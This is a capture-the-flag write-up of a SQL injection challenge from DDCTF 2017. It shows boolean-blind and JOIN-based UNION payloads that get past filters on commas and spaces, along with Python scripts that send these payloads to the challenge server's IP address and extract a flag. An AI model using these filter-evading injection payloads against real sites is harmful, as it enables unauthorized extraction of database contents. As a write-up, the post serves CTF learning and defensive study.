Sign In

  • Username:
  • Password:

Upload File

  •  

SQL Join Injection in DDCTF 2017

DDCTF is Re-CTF……Orz
and his SQLI problem is very instsresting.

It seems like Bool-Bind Injection, and it bans “,” and “ “.
Easy! Just use this payload:

?id=4%0Dand%0Dascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({n})to(1)))={ord(char)}

Get the structure like:

Database: t1
Table: news
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| title    | varchar(50) |
| content  | text        |
| secret   | text        |
+----------+-------------+

gogogo! next

select secret from news where id=4;

the secret is BANNED!

…..
……..
Let’s try another way,
it shows TITLE and CONTENT on the website, so we can try UNION SELECT
As it bans ‘ , ‘ , we can use JOIN :D

mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT F.4 from (select * from (select 1)i join (select 2)j join (select 3)k join (select 4)l union select 1,2,3,version())F limit 1 offset 1)d;
+---+---+---+-------------------------+
| 1 | 2 | 3 | 4                       |
+---+---+---+-------------------------+
| 1 | 2 | 3 | 5.7.17-0ubuntu0.16.04.1 |
+---+---+---+-------------------------+

So our payload:

import requests
url = 'http://118.190.134.8/t1/news.php?id=-1'
payload = " union select * from (select 1)A join (select 2)B join (select X.{column} from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d union select * from news)X limit 1 offset {row})C join (select 4)D".format(column=4,row=4).replace(' ','%0a')
rep = requests.get(url + payload)
print rep.content
print 'Payload >>> ' + url + payload

Bingo!

➜  ~ python dd_web1.py 
<html>
<head>
    <title>programmer news </title>
</head>
<body>

<h1>2</h1><p>flag{DDCTF-88458a95f96c4dfea359d1de2b03bbdb@didichuxing.com}</p></body>
</html>
Payload >>> http://118.190.134.8/t1/news.php?id=-1%0aunion%0aselect%0a*%0afrom%0a(select%0a1)A%0ajoin%0a(select%0a2)B%0ajoin%0a(select%0aX.4%0afrom%0a(select%0a*%0afrom%0a(select%0a1)a%0ajoin%0a(select%0a2)b%0ajoin%0a(select%0a3)c%0ajoin%0a(select%0a4)d%0aunion%0aselect%0a*%0afrom%0anews)X%0alimit%0a1%0aoffset%0a4)C%0ajoin%0a(select%0a4)D

Refer: http://www.venenof.com/index.php/archives/240/


Here’s another solution - Union Blind Injection

#Author: 胖虎(...)
import requests
url = "http://118.190.134.8/t1/news.php?id=4%0aUNION%0aall%0aSELECT%0a*%0aFROM%0a((SELECT%0a1)a%0aJOIN%0a(SELECT%0a2)b%0aJOIN%0a(SELECT%0a0x33)c%0aJOIN%0a(SELECT%0a"
payload = "0x"
url2 = ")d)%0aorder%0aby%0a4%0adesc"
txt = requests.get("http://118.190.134.8/t1/news.php?id=4%0aUNION%0aall%0aSELECT%0a*%0aFROM%0a((SELECT%0a1)a%0aJOIN%0a(SELECT%0a2)b%0aJOIN%0a(SELECT%0a0x33)c%0aJOIN%0a(SELECT%0a0x67)d)%0aorder%0aby%0a4%0adesc").content
flag = ""
sqllist = ["2D","2E","30","31","32","33","34","35","36","37","38","39","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7D","7E"]
for x in range(62):
    for y in range(len(sqllist)):
        attack = requests.get(url+payload+sqllist[y]+url2).content
        if attack == txt:
            if y == 0:
                flag+=(sqllist[0].decode('hex'))
            else:
                flag+=(sqllist[y-1].decode('hex'))
                payload +=sqllist[y-1]
                break
    print flag
print "ok"